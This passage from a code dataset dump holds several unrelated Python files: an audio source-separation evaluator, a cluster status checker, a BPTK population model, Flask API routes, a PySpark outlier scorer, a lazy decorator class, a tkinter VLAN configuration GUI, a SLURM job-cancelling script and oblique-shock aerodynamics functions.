X.astype('float32')\n\n (sources, sourceclass, inp) = model.predict(X, batch_size=1)\n classresults.append(sourceclass)\n sourceclass_hat = np.around(sourceclass, decimals = 1)\n sourceclass_hat[sourceclass_hat <= 0.5] = 0\n sourceclass_hat[sourceclass_hat > 0.5] = 1\n classresults_hat.append(sourceclass_hat)\n\n sources_reshape = np.reshape(sources, (1025, 94, 1, 4))\n orig_reshape = np.reshape(orig, (1025, 94, 1))\n source_spec = norbert.wiener(sources_reshape, orig_reshape, use_softmask=True)\n\n inp_reshape = np.reshape(inp, (1025, 94, 1, 1))\n inp = norbert.wiener(inp_reshape, orig_reshape, use_softmask=False)\n inp_spec = np.reshape(inp, (1025, 94))\n #inp_spec = mulphase(target_pred_mag_inp, phase)\n\n voc_spec = np.reshape(source_spec[:,:,:,0], (1025, 94))\n bas_spec = np.reshape(source_spec[:,:,:,1], (1025, 94))\n dru_spec = np.reshape(source_spec[:,:,:,2], (1025, 94))\n oth_spec = np.reshape(source_spec[:,:,:,3], (1025, 94))\n\n # Get ground truth\n gt_voc, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/vocals.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_voc) > 0.05)): labelclass[0] = 1\n # gt_voc_down = scipy.signal.decimate(gt_voc, 2)\n gt_voc_final = np.reshape(gt_voc, (1, gt_voc.shape[0], 1))\n\n gt_bas, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/bass.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_bas) > 0.05)): labelclass[1] = 1\n # gt_bas_down = scipy.signal.decimate(gt_bas, 2)\n gt_bas_final = np.reshape(gt_bas, (1, gt_bas.shape[0], 1))\n\n gt_dru, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/drums.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_dru) > 0.05)): labelclass[2] = 1\n # gt_dru_down = scipy.signal.decimate(gt_dru, 2)\n gt_dru_final = np.reshape(gt_dru, (1, gt_dru.shape[0], 1))\n\n gt_others, sr = librosa.load(str('D:/Data/Musdb18/groundtruth/test/' + track.name + '/other.wav'), offset=i, duration=3, mono=True, sr=16000)\n if ((checkNoise(gt_others) > 0.05)): labelclass[3] = 1\n # gt_others_down = scipy.signal.decimate(gt_others, 2)\n gt_others_final = np.reshape(gt_others, (1, gt_others.shape[0], 1))\n\n gt_inp_final = np.reshape(mixture, (1, mixture.shape[0], 1))\n\n labelresults.append(labelclass)\n\n # Get predictions\n vocals = librosa.core.istft(voc_spec, hop_length=hop_size, length=gt_voc_final.shape[1], window=window, win_length=window_size)\n # vocals = scipy.signal.wiener(vocals)\n vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n\n bass = librosa.core.istft(bas_spec, hop_length=hop_size, length=gt_bas_final.shape[1], window=window, win_length=window_size)\n # bass = scipy.signal.wiener(bass)\n bass = np.reshape(bass, (1, bass.shape[0], 1))\n\n drums = librosa.core.istft(dru_spec, hop_length=hop_size, length=gt_dru_final.shape[1], window=window, win_length=window_size)\n # drums = scipy.signal.wiener(drums)\n drums = np.reshape(drums, (1, drums.shape[0], 1))\n\n others = librosa.core.istft(oth_spec, hop_length=hop_size, length=gt_others_final.shape[1], window=window, win_length=window_size)\n # others = scipy.signal.wiener(others)\n others = np.reshape(others, (1, others.shape[0], 1))\n\n # if(sourceclass[0][0] <= 0.5):\n # vocals = np.zeros((gt_voc_final.shape[1], 1))\n # # vocals.fill(0.04)\n # vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n # else:\n # vocals = librosa.core.istft(voc_spec, hop_length=hop_size, length=gt_voc_final.shape[1], window=window)\n # # vocals = 
scipy.signal.wiener(vocals)\n # vocals = np.reshape(vocals, (1, vocals.shape[0], 1))\n #\n # if(sourceclass[0][1] <= 0.5):\n # bass = np.zeros((gt_bas_final.shape[1], 1))\n # # bass.fill(0.04)\n # bass = np.reshape(bass, (1, bass.shape[0], 1))\n # else:\n # bass = librosa.core.istft(bas_spec, hop_length=hop_size, length=gt_bas_final.shape[1], window=window)\n # # bass = scipy.signal.wiener(bass)\n # bass = np.reshape(bass, (1, bass.shape[0], 1))\n #\n # if(sourceclass[0][2] <= 0.5):\n # drums = np.zeros((gt_dru_final.shape[1], 1))\n # # drums.fill(0.04)\n # drums = np.reshape(drums, (1, drums.shape[0], 1))\n # else:\n # drums = librosa.core.istft(dru_spec, hop_length=hop_size, length=gt_dru_final.shape[1], window=window)\n # # drums = scipy.signal.wiener(drums)\n # drums = np.reshape(drums, (1, drums.shape[0], 1))\n #\n # if(sourceclass[0][3] <= 0.5):\n # others = np.zeros((gt_others_final.shape[1], 1))\n # # others.fill(0.04)\n # others = np.reshape(others, (1, others.shape[0], 1))\n # else:\n # others = librosa.core.istft(oth_spec, hop_length=hop_size, length=gt_others_final.shape[1], window=window)\n # # others = scipy.signal.wiener(others)\n # others = np.reshape(others, (1, others.shape[0], 1))\n\n recov = librosa.core.istft(inp_spec, hop_length=hop_size, length=gt_inp_final.shape[1], window=window, win_length=window_size)\n # recov = scipy.signal.wiener(recov)\n recov = np.reshape(recov, (1, recov.shape[0], 1))\n\n all_zeros = np.all(gt_voc<=0) or np.all(gt_bas<=0) or np.all(gt_dru<=0) or np.all(gt_others<=0) or np.all(vocals<=0) or np.all(bass<=0) or np.all(drums<=0) or np.all(others<=0)\n # print(all_zeros)\n\n if all_zeros == False:\n # noise_thresh = checkNoise(gt_voc)\n #\n # if noise_thresh > 0.05:\n # noise_thresh = checkNoise(gt_bas)\n #\n # if noise_thresh > 0.05:\n # noise_thresh = checkNoise(gt_dru)\n #\n # if noise_thresh > 0.05:\n # Evaluate\n REF = np.concatenate((gt_voc_final, gt_bas_final, gt_dru_final, gt_others_final, gt_inp_final), axis=0)\n EST = np.concatenate((vocals, bass, drums, others, recov), axis=0)\n\n [SDR, ISR, SIR, SAR] = museval.evaluate(REF, EST, win=52565, hop=52565)\n SDR_results.append(SDR)\n ISR_results.append(ISR)\n SIR_results.append(SIR)\n SAR_results.append(SAR)\n\n y_true = np.array(labelresults, dtype=float)\n y_pred = np.array(classresults, dtype=float)\n y_pred = np.reshape(y_pred, (y_pred.shape[0], y_pred.shape[2]))\n y_pred_hat = np.array(classresults_hat, dtype=float)\n y_pred_hat = np.reshape(y_pred_hat, (y_pred_hat.shape[0], y_pred_hat.shape[2]))\n\n auc_voc, eer_voc = eval_metrics(y_true[:,0], y_pred[:,0])\n auc_bas, eer_bas = eval_metrics(y_true[:,1], y_pred[:,1])\n auc_dru, eer_dru = eval_metrics(y_true[:,2], y_pred[:,2])\n auc_oth, eer_oth = eval_metrics(y_true[:,3], y_pred[:,3])\n\n target_names = ['Vocals', 'Bass', 'Drums', 'Others']\n plot_multiclass_confusion_matrix(y_true, y_pred_hat, target_names, save_plot=False)\n\n SDR_array = np.array(SDR_results)\n SDR_array = np.reshape(SDR_array, (SDR_array.shape[0], SDR_array.shape[1]))\n SDR_df = pd.DataFrame(SDR_array)\n SDR_df.to_csv('SDR_revise1.csv')\n\n ISR_array = np.array(ISR_results)\n ISR_array = np.reshape(ISR_array, (ISR_array.shape[0], ISR_array.shape[1]))\n ISR_df = pd.DataFrame(ISR_array)\n ISR_df.to_csv('ISR_revise1.csv')\n\n SIR_array = np.array(SIR_results)\n SIR_array = np.reshape(SIR_array, (SIR_array.shape[0], SIR_array.shape[1]))\n SIR_df = pd.DataFrame(SIR_array)\n SIR_df.to_csv('SIR_revise1.csv')\n\n SAR_array = np.array(SAR_results)\n SAR_array = 
np.reshape(SAR_array, (SAR_array.shape[0], SAR_array.shape[1]))\n    SAR_df = pd.DataFrame(SAR_array)\n    SAR_df.to_csv('SAR_revise1.csv')\n\n    print(\"Vocals: AUC = \" + str(auc_voc) + \" | EER = \" + str(eer_voc) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,0]), decimals=3)))\n    print(\"Bass: AUC = \" + str(auc_bas) + \" | EER = \" + str(eer_bas) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,1]), decimals=3)))\n    print(\"Drums: AUC = \" + str(auc_dru) + \" | EER = \" + str(eer_dru) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,2]), decimals=3)))\n    print(\"Others: AUC = \" + str(auc_oth) + \" | EER = \" + str(eer_oth) + \" | SDR = \" + str(np.round(np.nanmedian(SDR_array[:,3]), decimals=3)))\n    print(\"SDR Recovered = \" + str(np.round(np.nanmedian(SDR_array[:,4]), decimals=3)))\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","sub_path":"series/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":16303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"292816045","text":"#!/usr/bin/env python\nimport argparse\n\nfrom operator import itemgetter\nfrom common import load_config\nfrom common import query_status\n\n\ndef main(args):\n    all_status = query_status(args)\n    if len(all_status) == 0:\n        print(\"No instance found in the cluster '{}'. Quit.\".format(args[\"name\"]))\n        return\n    print(\"{} clusters found with the name '{}'.\".format(len(all_status), args[\"name\"]))\n\n    num_ready = 0\n    for idx, status in enumerate(all_status):\n        total = len(status)\n        if total == 0:\n            continue\n        print(\"\\nCluster {}:\".format(idx + 1))\n        ready = sum(t[0] == \"running\" for t in status)\n        neighbors = list(map(itemgetter(1), status))\n        print(\" Total instances: {}\\n Running: {}\".format(total, ready))\n        if ready == 0:\n            print(\" Instances status: {}\".format(status[0][0]))\n            continue\n        with open(\"neighbors.txt\", 'w') as f:\n            if total == ready:\n                f.write(\"Ready. \")\n            else:\n                f.write(\"NOT ready. \")\n            f.write(\"IP addresses of all instances:\\n\")\n            f.write('\\n'.join(neighbors))\n        print(\" The public IP addresses of the instances have been written into \"\n              \"`./neighbors.txt`\")\n        # Count clusters whose IP addresses were written; without this the warning below can never trigger\n        num_ready += 1\n    if num_ready > 1:\n        print(\"WARN: More than 1 cluster with the name '{}' exists. \"\n              \"Only the IP addresses of the instances of the last cluster have been written to disk.\".format(args[\"name\"]))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description=\"Check the status of a cluster\")\n    parser.add_argument(\"--name\",\n                        required=True,\n                        help=\"cluster name\")\n    parser.add_argument(\"--credential\",\n                        help=\"path to the credential file\")\n    config = load_config(vars(parser.parse_args()))\n    main(config)","sub_path":"scripts/check-cluster.py","file_name":"check-cluster.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"609627470","text":"from BPTK_Py import Model\nfrom BPTK_Py import sd_functions as sd\nfrom import_data import *\nfrom general_functions import *\n\n\ndef set_model_logic(start_serial, stop_serial, df):\n    \"\"\" Setup model based on start date, end date, and df containing input data \"\"\"\n\n    time_step_in_days = 2\n\n    model = Model(\n        starttime=start_serial,\n        stoptime=stop_serial,\n        dt=1.0 * time_step_in_days,\n    )\n\n    # create stocks (w/ initial values, and connect initial values)\n    P_s, P_s_iv = create_model_stock(model, \"Producer Stock\")\n\n    # create flows\n    P_birth_f = model.flow(\"Birth Rate\")\n    P_death_f = model.flow(\"Total Death Rate\")\n\n    # create converters\n    lifespan = model.converter(\"Average Lifespan\")\n    fertility = model.converter(\"Average Fertility\")\n    illness_death_rate = model.converter(\"Illness Death Rate\")\n    normal_death_rate = model.converter(\"Normal Death Rate\")\n\n    # create constants\n    lifespan_bl = model.constant(\"Lifespan Baseline\")\n    fertility_bl = model.constant(\"Fertility Baseline\")\n    health = model.constant(\"Animal Health\")\n    illness_death_t = model.constant(\"Illness Death Time\")\n\n    # create data inputs (points AND corresponding converters)\n    price_vam = create_model_data_variable(model, df, \"Price (VAM)\")\n    cpi_fao = create_model_data_variable(model, df, \"CPI (FAO)\")\n\n    # attach flows to stocks\n    P_s.equation = P_birth_f - P_death_f\n\n    # set equations for flows and converters\n    lifespan.equation = lifespan_bl * health\n    fertility.equation = fertility_bl\n    P_birth_f.equation = P_s * fertility\n    normal_death_rate.equation = P_s / lifespan\n    illness_death_rate.equation = P_s * (1.0 - health) / illness_death_t\n    P_death_f.equation = normal_death_rate + illness_death_rate\n\n    # set default values for constants\n    P_s_iv.equation = 100.0\n    lifespan_bl.equation = 20.0 * 365.0\n    fertility_bl.equation = 0.1 / 365.0\n    health.equation = 1.0\n    illness_death_t.equation = 0.5 * 365.0\n\n    return model\n","sub_path":"model_config.py","file_name":"model_config.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"106880620","text":"import json\nimport time\n\nimport ntplib\nfrom flask import request, Response, jsonify\n\nfrom engine import app\nfrom model.preload import Stream\nimport util.calc\nfrom util.cass import stream_exists\nfrom util.common import CachedParameter, StreamEngineException, MalformedRequestException, \\\n    InvalidStreamException, StreamUnavailableException, InvalidParameterException\n\n\n@app.errorhandler(StreamEngineException)\ndef handle_stream_not_found(error):\n    response = jsonify(error.to_dict())\n    response.status_code = error.status_code\n    return response\n\n\n@app.route('/particles', methods=['POST'])\ndef particles():\n    \"\"\"\n    POST should contain a dictionary of the following format:\n    {\n        
'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ],\n 'coefficients': {\n 'CC_a0': 1.0,\n ...\n },\n 'start': ntptime,\n 'stop': ntptime\n }\n\n :return: JSON object:\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n start = input_data.get('start', 1)\n stop = input_data.get('stop', ntplib.system_to_ntp_time(time.time()))\n return Response(util.calc.get_particles(input_data.get('streams'), start, stop, input_data.get('coefficients', {})),\n mimetype='application/json')\n\n\n@app.route('/netcdf', methods=['POST'])\ndef netcdf():\n \"\"\"\n POST should contain a dictionary of the following format:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ],\n 'coefficients': {\n 'CC_a0': 1.0,\n ...\n },\n 'start': ntptime,\n 'stop': ntptime\n }\n\n :return: JSON object:\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n start = input_data.get('start', 1)\n stop = input_data.get('stop', ntplib.system_to_ntp_time(time.time()))\n return Response(util.calc.get_netcdf(input_data.get('streams'), start, stop, input_data.get('coefficients', {})),\n mimetype='application/netcdf')\n\n\n@app.route('/needs', methods=['POST'])\ndef needs():\n \"\"\"\n Given a list of reference designators, streams and parameters, return the\n needed calibration constants for each reference designator\n and the data products which can be computed. Data products which\n are missing L0 data shall not be returned.\n\n Currently no validation on time frames is provided. If the necessary L0\n data from any time frame is available then this method will return that\n product in the list of parameters. 
When the algorithm is run, a determination\n if the needed data is present will be made.\n\n Note, this method may return more reference designators than specified\n in the request, should more L0 data be required.\n\n POST should contain a dictionary of the following format:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'parameters': [...],\n },\n ...\n ]\n }\n\n :return: JSON object:\n {\n 'streams': [\n {\n 'subsite': subsite,\n 'node': node,\n 'sensor': sensor,\n 'method': method,\n 'stream': stream,\n 'coefficients': [...],\n 'parameters': [...],\n },\n ...\n ]\n }\n \"\"\"\n input_data = request.get_json()\n validate(input_data)\n output_data = {'streams': util.calc.get_needs(input_data.get('streams'))}\n return Response(json.dumps(output_data), mimetype='application/json')\n\n\ndef validate(input_data):\n if input_data is None:\n raise MalformedRequestException('Received NULL input data')\n\n streams = input_data.get('streams')\n if streams is None or not isinstance(streams, list):\n raise MalformedRequestException('Received invalid request', payload={'request': input_data})\n\n for each in streams:\n if not isinstance(each, dict):\n raise MalformedRequestException('Received invalid request, stream is not dictionary',\n payload={'request': input_data})\n keys = each.keys()\n required = {'subsite', 'node', 'sensor', 'method', 'stream'}\n missing = required.difference(keys)\n if len(missing) > 0:\n raise MalformedRequestException('Missing stream information from request',\n payload={'request': input_data})\n\n stream = Stream.query.filter(Stream.name == each['stream']).first()\n if stream is None:\n raise InvalidStreamException('The requested stream does not exist in preload', payload={'stream': each})\n\n if not stream_exists(each['subsite'],\n each['node'],\n each['sensor'],\n each['method'],\n each['stream']):\n raise StreamUnavailableException('The requested stream does not exist in cassandra',\n payload={'stream' :each})\n\n parameters = each.get('parameters', [])\n stream_parameters = [p.id for p in stream.parameters]\n for pid in parameters:\n p = CachedParameter.from_id(pid)\n if p is None:\n raise InvalidParameterException('The requested parameter does not exist in preload',\n payload={'id': pid})\n\n if pid not in stream_parameters:\n raise InvalidParameterException('The requested parameter does not exist in this stream',\n payload={'id': pid, 'stream': each})\n\n if not isinstance(input_data.get('coefficients', {}), dict):\n raise MalformedRequestException('Received invalid coefficient data, must be a map',\n payload={'coefficients': input_data.get('coefficients')})","sub_path":"engine/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"257178287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pyspark import SparkContext\nfrom operator import add\nimport pandas as pd\nimport numpy as np\nsc = SparkContext()\n\n\ndef get_categ_column_list(file):\n\tdf = pd.DataFrame.from_csv(file, sep='\\t', index_col=None)\n\n\tname_lst = list(df.select_dtypes(include=['object']).columns)\n\tindex_lst = [df.columns.get_loc(i) for i in name_lst]\n\treturn index_lst, name_lst\n\ndef parseDevelopmentDatasetLine(line):\n\tline = line.split('\\t')\n\tretval = []\n\tfor i in range(len(index_lst)):\n\t\tkey = name_lst[i]\n\t\tvalue = line[index_lst[i]]\n\t\tretval.append((key, 
value))\n\n\treturn retval\n\ndef attributeValueFrequencyScorer(line):\n\t\"\"\"\n\tConnects each line to attribute value frequency score (up to constant factor)\n\n\t:param line: line turned to list of (label, value) tuples\n\t:returns: original line and attribute value frequency score.\n\t\"\"\"\n\n\t# Let's score each line and create a tuple (line, score)\n\tscore = 0\n\tfor item in line:\n\t# item[0] is attribute id\n\t# item[1] is value of the attribute\n\n\t\tscore += counts[str(item[0])][str(item[1])]\n\n\treturn (line, score)\n\n\nif __name__ == '__main__':\n\tindex_lst, name_lst = get_categ_column_list('5fn4-dr26.tsv')\n\n\n\tdata = sc.textFile('5fn4-dr26.tsv')\n\theader = data.first()\n\tdata = data.filter(lambda row: row != header)\n\tparsed_data = data.map(parseDevelopmentDatasetLine)\n\n\t# Let's count the number of times different attribute values\n\t# are present in the dataset.\n\n\tgrouped_by_attribute_value_labels = parsed_data.flatMap(lambda x: x).reduceByKey(lambda x,y: x + '\\t' + y )\n#\tprint(grouped_by_attribute_value_labels.take(5))\n\tkeys = grouped_by_attribute_value_labels.keys().collect()\n\n\t# Count for all possible values for each attribute value\n\tcounts = {}\n\tfor key in keys:\n\t\t# Let's turn tuples to dict\n\t\tvalues = grouped_by_attribute_value_labels.filter(lambda x: x[0] == key).flatMap(lambda x: x[1].split('\\t')).map(lambda x: (x, 1)).reduceByKey(add).collect()\n\t\tcounts[str(key)] = dict(values)\n\n\t# Let's go through the dataset and score each item\n\tavf_scored_data = parsed_data.map(attributeValueFrequencyScorer).sortBy(lambda x: x[1])\n\n\toutliers = avf_scored_data.take(10) # Let's print 10 most likely outliers\n\tfor item in outliers:\n\t\tprint (item)\n\n\tsc.parallelize(outliers).saveAsTextFile('avf.out')\n","sub_path":"avf_v1.py","file_name":"avf_v1.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"284200492","text":"#! /usr/bin/env python\n\"\"\"\nCopyright (C) 2011 by Peter A. Donis.\nReleased under the open source MIT license:\nhttp://www.opensource.org/licenses/MIT\n\nDecorator wrapper class to delay decorating the base function until\nit is actually invoked. The use case that prompted writing this class\nwas the desire to \"memoize\" the generator encapsulated in the\n``PowerSeries`` class. The obvious Pythonic way to do this is to\nwrite a decorator that can be applied to a method on the class, and\nmake the method a generator function which the decorator then turns\ninto a memoized generator. However, if the decorator is implemented\nin the usual way, this does not work properly; the memoization is done\nat the class level, when what is really desired is to do it at the\ninstance level. In other words, the usual decorator implementation\nwould make the decorated method a normal member of the class, but\nthat would result in the memoized generator becoming common to *all*\ninstances of the class. Since each instance represents a different\npower series, and hence a different generator, this is not what is\nneeded.\n\nThe solution is to delay applying the decorator until the decorated\nfunction is actually called. For an ordinary function, this does\nnot really change anything; but for a method, it means the decorator\nwrapper can now use the descriptor protocol to be invoked each time\nthe method is called on a new instance of the class. 
Then the\ndecorator can be applied separately for each instance; in the case\nof the ``PowerSeries`` class, it means each series gets its own\nmemoized generator, as desired. As a side effect, the decorator is\nalso applied the first time the method is called as an unbound\nmethod on the class itself; this use case should be very rare, but\nit is supported for consistency with the behavior of normal methods.\n\nTypical usage and comparison with normal decorators:\n \n >>> def decorator(f):\n ... print \"Decorating\", f.__name__\n ... return f\n ...\n >>> @decorator\n ... def test1():\n ... print \"Tested!\"\n ...\n Decorating test1\n >>> test1()\n Tested!\n >>> test1()\n Tested!\n >>> def deco(f):\n ... return DelayedDecorator(decorator, f)\n ...\n >>> @deco\n ... def test2():\n ... print \"Tested again!\"\n ...\n >>> test2()\n Decorating test2\n Tested again!\n >>> test2()\n Tested again!\n >>> class TestA(object):\n ... @decorator\n ... def test3(self):\n ... print \"Test from\", self.__class__.__name__\n ...\n Decorating test3\n >>> a = TestA()\n >>> aa = TestA()\n >>> a.test3()\n Test from TestA\n >>> aa.test3()\n Test from TestA\n >>> aa.test3()\n Test from TestA\n >>> a.test3()\n Test from TestA\n >>> class TestB(object):\n ... @deco\n ... def test4(self):\n ... print \"Test from\", self.__class__.__name__\n ...\n >>> b = TestB()\n >>> bb = TestB()\n >>> b.test4()\n Decorating test4\n Test from TestB\n >>> bb.test4()\n Decorating test4\n Test from TestB\n >>> bb.test4()\n Test from TestB\n >>> b.test4()\n Test from TestB\n\"\"\"\n\nfrom new import instancemethod\n\n\nclass DelayedDecorator(object):\n \"\"\"Wrapper that delays decorating a function until it is invoked.\n \n This class allows a decorator to be used with both ordinary functions and\n methods of classes. It wraps the function passed to it with the decorator\n passed to it, but with some special handling:\n \n - If the wrapped function is an ordinary function, it will be decorated\n the first time it is called.\n \n - If the wrapped function is a method of a class, it will be decorated\n separately the first time it is called on each instance of the class.\n It will also be decorated separately the first time it is called as\n an unbound method of the class itself (though this use case should\n be rare).\n \"\"\"\n \n def __init__(self, deco, func):\n # The base decorated function (which may be modified, see below)\n self._func = func\n # The decorator that will be applied\n self._deco = deco\n # Variable to monitor calling as an ordinary function\n self.__decofunc = None\n # Variable to monitor calling as an unbound method\n self.__clsfunc = None\n \n def _decorated(self, cls=None, instance=None):\n \"\"\"Return the decorated function.\n \n This method is for internal use only; it can be implemented by\n subclasses to modify the actual decorated function before it is\n returned. The ``cls`` and ``instance`` parameters are supplied so\n this method can tell how it was invoked. 
If it is not overridden,\n the base function stored when this class was instantiated will\n be decorated by the decorator passed when this class was instantiated,\n and then returned.\n \n Note that factoring out this method, in addition to allowing\n subclasses to modify the decorated function, ensures that the\n right thing is done automatically when the decorated function\n itself is a higher-order function (e.g., a generator function).\n Since this method is called every time the decorated function\n is accessed, a new instance of whatever it returns will be\n created (e.g., a new generator will be realized), which is\n exactly the expected semantics.\n \"\"\"\n return self._deco(self._func)\n \n def __call__(self, *args, **kwargs):\n \"\"\"Direct function call syntax support.\n \n This makes an instance of this class work just like the underlying\n decorated function when called directly as an ordinary function.\n An internal reference to the decorated function is stored so that\n future direct calls will get the stored function.\n \"\"\"\n if not self.__decofunc:\n self.__decofunc = self._decorated()\n return self.__decofunc(*args, **kwargs)\n \n def __get__(self, instance, cls):\n \"\"\"Descriptor protocol support.\n \n This makes an instance of this class function correctly when it\n is used to decorate a method on a user-defined class. If called\n as a bound method, we store the decorated function in the instance\n dictionary, so we will not be called again for that instance. If\n called as an unbound method, we store a reference to the decorated\n function internally and use it on future unbound method calls.\n \"\"\"\n if instance:\n deco = instancemethod(self._decorated(cls, instance), instance, cls)\n # This prevents us from being called again for this instance\n setattr(instance, self._func.__name__, deco)\n elif cls:\n if not self.__clsfunc:\n self.__clsfunc = instancemethod(self._decorated(cls), None, cls)\n deco = self.__clsfunc\n else:\n raise ValueError(\"Must supply instance or class to descriptor.\")\n return deco\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"DelayedDecorator.py","file_name":"DelayedDecorator.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183652711","text":"#!/usr/bin/env python3\n\nfrom collections import OrderedDict\nimport json\nimport os\nimport signal\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\nroot = tk.Tk()\nroot.geometry(\"600x350\")\n\nroot.columnconfigure(0, weight=1)\nroot.columnconfigure(1, weight=2)\nroot.rowconfigure(0, weight=1)\n\n#mapping from json key name to label text\nelements = OrderedDict([('vlan_id', 'Vlan Id'), ('vrf', 'VRF Instance'), ('addr', 'L3 gateway address'), ('mask', 'Subnet mask CIDR'), ('mcast_grp', 'Mcast address mapping')])\n\n\ndef sigint_handler(signum, frame):\n exitbox = tk.messagebox.askquestion('Exit?', 'Are you sure you want to exit?', icon='warning')\n if exitbox == 'yes':\n root.destroy()\n\n\ndef getInput():\n filename = filedialog.asksaveasfilename(initialdir=os.getcwd(), title='Select filename to save as', filetypes=(('json files', '*.json'), ('all files', '*.*')))\n\n data = {}\n\n for elem in entries:\n entry = entries[elem]\n data[elem] = entry.get()\n if elem == 'vlan_id':\n data['l2_vni_id'] = data[elem] + '10'\n\n with open(filename, 'w') as jsonfile:\n json.dump(data, jsonfile)\n\n\nrectangle_topleft = 
tk.Label(root, text=\"Singh Swan Song: \", bg=\"black\", fg=\"white\")\nrectangle_topleft.grid(column=0, row=0, ipadx=30, ipady=30, sticky=\"EW\")\nrectangle_topright = tk.Label(root, text=\"L2vni Configuration Generator: \", bg=\"black\", fg=\"white\")\nrectangle_topright.grid(column=1, row=0, ipadx=30, ipady=30, sticky=\"EW\")\n\nrectangles = []\nentries = OrderedDict()\nfor i, elem in enumerate(elements):\n bgcolour = \"green\" if i%2 == 0 else \"red\"\n rect = tk.Label(root, text=elements[elem] + ':', bg=bgcolour, fg=\"white\")\n rect.grid(column=0, row=i+1, ipadx=10, ipady=10, sticky=\"EW\")\n rectangles.append(rect)\n entry = tk.Entry(root)\n entry.grid(column=1, row=i+1, ipadx=10, ipady=10, sticky=\"EW\")\n entries[elem] = entry\n\n\nbutton = tk.Button(root, text=\"submit\", command=getInput)\nbutton.grid(column=0, row=6, ipadx=10, ipady=10, sticky=\"EW\")\n\n#setup a sig handler for ctrl-c\nsignal.signal(signal.SIGINT, sigint_handler)\n\nroot.mainloop()\n","sub_path":"L2_vni/guijson_vlantovni_map.py","file_name":"guijson_vlantovni_map.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"638350139","text":"from subprocess import Popen, PIPE\nimport re\nimport os\n\n\n# Get the name of the user\nproc = Popen(['whoami'], stdout=PIPE, stderr=PIPE)\no, _ = proc.communicate()\nusername = o.decode('ascii').strip()\n\n# Get all jobs under username\noutput = os.popen(\"squeue | grep {}\".format(username)).read()\n\n# Find all job ids\njob_ids = [int(s)\n for s in re.findall(r'\\d+', output) if int(s) > 10000000]\n\nfor job_id in job_ids:\n os.system(\"scancel {}\".format(job_id))\n print(\"Killed job: \", job_id)\n\n","sub_path":"parameter_server/submit/kill.py","file_name":"kill.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"218199832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 19 20:49:25 2021\n@author: dbric\n\"\"\"\n\n\"\"\"\nDeclan Brick\nMatthew Bethea\n2/17/21\nMAE 343\nProject 1\n\"\"\"\n\n#import here\nimport math\n\ndef mach(gamma, Beta, Theta):\n \n B = math.radians(Beta)\n T = math.radians(Theta)\n g = gamma\n \n RMach = math.sqrt((-2*math.tan(T)-2*(1/(math.tan(B)))/(g*math.tan(T)+math.tan(T)*math.cos(2*B)-2*math.sin(B)*math.sin(B)*(1/(math.tan(B))))))\n \n return RMach\n\n\ndef theta(gamma, Mach, Beta):\n \n g = gamma\n M = Mach\n B = Beta\n \n \"\"\"\n Calculates flow deflection angle using Equation 1 in the Project Description Parameters\n ----------\n g : Float\n Ratio of specific heats\n M : Float\n Free Stream Mach Number before Shock\n Beta : Float\n Oblique Shock Angle, in degrees\n \n Returns\n -------\n Theta: Float\n Flow Deflection Angle, in degrees\n \"\"\"\n\n \n #Just writing rhs of Equation 1\n Tan_Theta=2*(1/math.tan(math.radians(B)))*(M**2*(math.sin(math.radians(B)))**2-1)/(M**2*(g+math.cos(math.radians(2*B)))+2)\n \n #Now grabbing the actual angle\n RTheta=math.degrees(math.atan(Tan_Theta))\n \n return RTheta\n #this was verified using a Ti-84 to output the correct answer, but many want to change output decimal precision\n\n\ndef beta(gamma, Mach, Theta):\n \n \n g = gamma\n M = Mach\n T = Theta\n \n #using the functions for finding Beta max (the maximum shock angle) supported by the maximum Theta (the maximum flow deflection)\n f = lambda B: 
